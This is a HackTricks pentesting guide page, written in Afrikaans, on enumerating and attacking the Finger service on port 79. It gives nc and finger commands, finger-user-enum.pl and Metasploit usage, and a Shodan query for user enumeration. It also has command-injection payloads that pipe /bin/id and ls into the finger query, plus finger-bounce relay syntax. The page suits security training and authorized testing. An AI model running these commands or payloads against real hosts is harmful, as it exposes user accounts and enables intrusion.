79 - Pentesting Finger

Reading time: 2 minutes

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

Basiese Inligting

Die Finger program/dienst word gebruik om besonderhede oor rekenaargebruikers te verkry. Gewoonlik sluit die inligting wat verskaf word die gebruiker se aanmeldnaam, volle naam, en, in sommige gevalle, addisionele besonderhede in. Hierdie addisionele besonderhede kan die kantoor ligging en telefoonnommer (indien beskikbaar), die tyd wat die gebruiker aangemeld het, die periode van inaktiwiteit (idle time), die laaste keer wat die gebruiker e-pos gelees het, en die inhoud van die gebruiker se plan en projeklêers insluit.

Standaard poort: 79

PORT   STATE SERVICE
79/tcp open  finger

Opname

bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79

Gebruiker enumerasie

bash
finger @<Victim>       #List users
finger admin@<Victim>  #Get info of user
finger user@<Victim>   #Get info of user

Alternatiewelik kan jy finger-user-enum van pentestmonkey gebruik, sommige voorbeelde:

bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt

Nmap voer 'n skrip uit om standaard skripte te gebruik

Metasploit gebruik meer truuks as Nmap

use auxiliary/scanner/finger/finger_users

Shodan

  • port:79 USER

Opdrag uitvoering

bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"

Vinger Bounce

Gebruik 'n stelsel as 'n vinger relais

finger user@host@victim
finger @internal@external

tip

Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks